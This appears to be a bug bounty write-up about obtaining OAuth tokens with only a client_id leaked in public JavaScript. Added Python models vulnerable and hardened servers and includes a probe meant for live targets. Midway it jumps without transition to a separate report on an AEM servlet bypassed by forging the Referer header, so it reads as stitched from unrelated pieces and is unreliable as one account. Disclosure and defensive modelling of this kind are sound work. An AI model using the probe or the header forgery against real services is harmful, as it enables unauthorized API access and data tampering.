Vulnerability Summary
What started as routine JavaScript analysis ended in a broken OAuth flow that allowed unauthenticated access to protected APIs, and a €1500 bug bounty reward.
While performing reconnaissance on a web application, I discovered that it was possible to obtain a valid OAuth access token without any authentication.
The issue started with a publicly accessible JavaScript file that exposed an OAuth client_id.
Using only this identifier, the authorization server issued a valid access token without requiring any user authentication.
That token could then be used to call protected backend APIs that executed real business logic.
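The two steps above (pull the OAuth settings out of a public bundle, then ask the token endpoint for a token with nothing but the client_id) are easy to turn into a repeatable check. The following is an added example, not code from the report or the target; the sample JS bundle, the client registry, the `client_credentials` grant and the endpoint URLs are all constructed assumptions. It models a token endpoint that issues a token to any registered client_id next to one that enforces a per-client grant allow-list and refuses `client_credentials` to a public client, and a probe that can be pointed at either model or, via a `requests.post` wrapper, at a live target.

```python
import hmac
import re

# Constructed sample of a public front-end bundle; not the target's real file.
SAMPLE_JS = r"""
window.__AUTH__ = {
  clientId: "spa-prod-7c21",
  tokenEndpoint: "https://auth.example.com/oauth/token",
  scope: "api:read api:write",
};
"""

# Keys that commonly carry OAuth settings in front-end bundles (assumed list).
OAUTH_KEYS = ("client_id", "clientId", "token_endpoint", "tokenEndpoint", "scope")


def extract_oauth_config(js_source: str) -> dict:
    """Pull quoted values for known OAuth keys out of JS text (key: "value" or "key": 'value')."""
    found = {}
    for key in OAUTH_KEYS:
        pattern = r'["\']?' + re.escape(key) + r'["\']?\s*:\s*["\']([^"\']+)["\']'
        match = re.search(pattern, js_source)
        if match:
            found[key] = match.group(1)
    return found


# Assumed client registry of the authorization server (constructed). The SPA is a
# public client: it has no secret and is only registered for the code flow.
CLIENTS = {
    "spa-prod-7c21": {"public": True, "secret": None, "grants": {"authorization_code"}},
}


def vulnerable_token_endpoint(form: dict) -> tuple:
    """Model of the broken server: any registered client_id gets a client_credentials token."""
    if form.get("client_id") not in CLIENTS:
        return 401, {"error": "invalid_client"}
    if form.get("grant_type") != "client_credentials":
        return 400, {"error": "unsupported_grant_type"}
    return 200, {"access_token": "tok-" + form["client_id"], "token_type": "Bearer"}


def hardened_token_endpoint(form: dict) -> tuple:
    """Model of a correct server: grant allow-list per client, secret required for client_credentials."""
    client = CLIENTS.get(form.get("client_id"))
    if client is None:
        return 401, {"error": "invalid_client"}
    grant = form.get("grant_type")
    if grant not in client["grants"]:
        return 400, {"error": "unauthorized_client"}
    if grant == "client_credentials":
        # A public client can never prove its identity, so it never gets this grant.
        secret = form.get("client_secret", "")
        if client["public"] or not hmac.compare_digest(secret, client["secret"] or ""):
            return 401, {"error": "invalid_client"}
        return 200, {"access_token": "tok-" + form["client_id"], "token_type": "Bearer"}
    # authorization_code: a token needs a code that was actually issued to a user (none here).
    return 400, {"error": "invalid_grant"}


def probe_public_client(config: dict, post) -> dict:
    """Send the minimal request the exposed client_id allows: no secret, no user, no code.

    `post(url, form)` must return (status_code, json_body); pass a wrapper around
    requests.post for a live target, or one of the model endpoints above.
    """
    form = {
        "grant_type": "client_credentials",
        "client_id": config["clientId"],
        "scope": config.get("scope", ""),
    }
    status, body = post(config["tokenEndpoint"], form)
    return {"status": status, "token_issued": status == 200 and "access_token" in body}


if __name__ == "__main__":
    cfg = extract_oauth_config(SAMPLE_JS)
    for name, endpoint in (("vulnerable", vulnerable_token_endpoint), ("hardened", hardened_token_endpoint)):
        print(name, probe_public_client(cfg, lambda url, form: endpoint(form)))
```

A `token_issued: True` result against a live endpoint with no secret and no user interaction is the finding described above; the fix is on the server side (register the SPA as a public client limited to the authorization code flow, and never enable `client_credentials` for a client that cannot keep a secret), not in the JavaScript, since a client_id in a browser bundle is public by design.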
An unauthenticated AEM Sling servlet exposes four CRUD operations (getData / getDataById / setData / updateData) on the internal marketing-campaign database via a single option request header. The only access control is a Referer string check that any HTTP client trivially bypasses. Anonymous attackers can read the full 79-campaign dataset (including internal segmentation logic and the names of internal prospect databases), create arbitrary new campaigns in the production backoffice, and overwrite existing real production campaigns.
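Why a Referer check is not an access control: the header is set by the client, so any HTTP library can supply whatever string the server expects. The following is an added example, not the report's or Adobe's code. It models a four-operation handler keyed by an `option` header over an in-memory store (constructed sample records, an assumed trusted Referer prefix and an assumed admin role), showing the Referer-only gate being passed by an anonymous caller with a forged header, next to a version that authorizes on the server-side principal and requires a CSRF check for the two state-changing operations.

```python
from copy import deepcopy

# Constructed sample records; not the report's campaign data.
SEED_CAMPAIGNS = {
    1: {"name": "spring-launch", "segment": "SMB", "source_db": "prospects_eu"},
    2: {"name": "renewal-push", "segment": "Enterprise", "source_db": "prospects_us"},
}

TRUSTED_REFERER = "https://backoffice.example.com/"  # assumed value of the string check
MARKETING_ADMINS = {"alice"}                          # assumed role membership


class CampaignServlet:
    """Four operations selected by an `option` request header, over an in-memory store."""

    def __init__(self):
        self.campaigns = deepcopy(SEED_CAMPAIGNS)

    def dispatch(self, option, body):
        if option == "getData":
            return 200, self.campaigns
        if option == "getDataById":
            row = self.campaigns.get(body.get("id"))
            return (200, row) if row else (404, {"error": "not found"})
        if option == "setData":
            new_id = max(self.campaigns, default=0) + 1
            self.campaigns[new_id] = body["campaign"]
            return 201, {"id": new_id}
        if option == "updateData":
            if body.get("id") not in self.campaigns:
                return 404, {"error": "not found"}
            self.campaigns[body["id"]] = body["campaign"]
            return 200, {"id": body["id"]}
        return 400, {"error": "unknown option"}


def handle_referer_only(servlet, headers, body, principal="anonymous"):
    """Model of the vulnerable gate: Referer is the only check, and the client chooses it.

    `principal` is accepted but never consulted, which is exactly the flaw.
    """
    if not headers.get("Referer", "").startswith(TRUSTED_REFERER):
        return 403, {"error": "forbidden"}
    return servlet.dispatch(headers.get("option"), body)


def handle_hardened(servlet, headers, body, principal="anonymous", csrf_ok=False):
    """Authorize on the authenticated principal; Referer is never consulted.

    `csrf_ok` stands in for the framework's CSRF token validation (assumed).
    """
    if principal not in MARKETING_ADMINS:
        return 403, {"error": "forbidden"}
    option = headers.get("option")
    if option in ("setData", "updateData") and not csrf_ok:
        return 403, {"error": "missing csrf token"}
    return servlet.dispatch(option, body)


if __name__ == "__main__":
    forged = {"Referer": TRUSTED_REFERER + "campaigns", "option": "getData"}
    print("referer-only, anonymous:", handle_referer_only(CampaignServlet(), forged, {}))
    print("hardened, anonymous:   ", handle_hardened(CampaignServlet(), forged, {}))
```

The forged header is a one-liner in any client (`-H 'Referer: ...'` in curl), so the only meaningful gates are the ones the client cannot set: the authenticated session or principal the server resolves itself, and a CSRF token for writes.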
HackerOne disclosed report: https://hackerone.com/reports/3676308 (by glferreira-devsecops)
Great write-up! It's quite interesting how by digging into JS files it's possible to obtain sensitive information such as the client_id and to escalate privileges by accessing protected API endpoints. It requires critical thinking and a good eye for detail. Thanks for sharing!
<3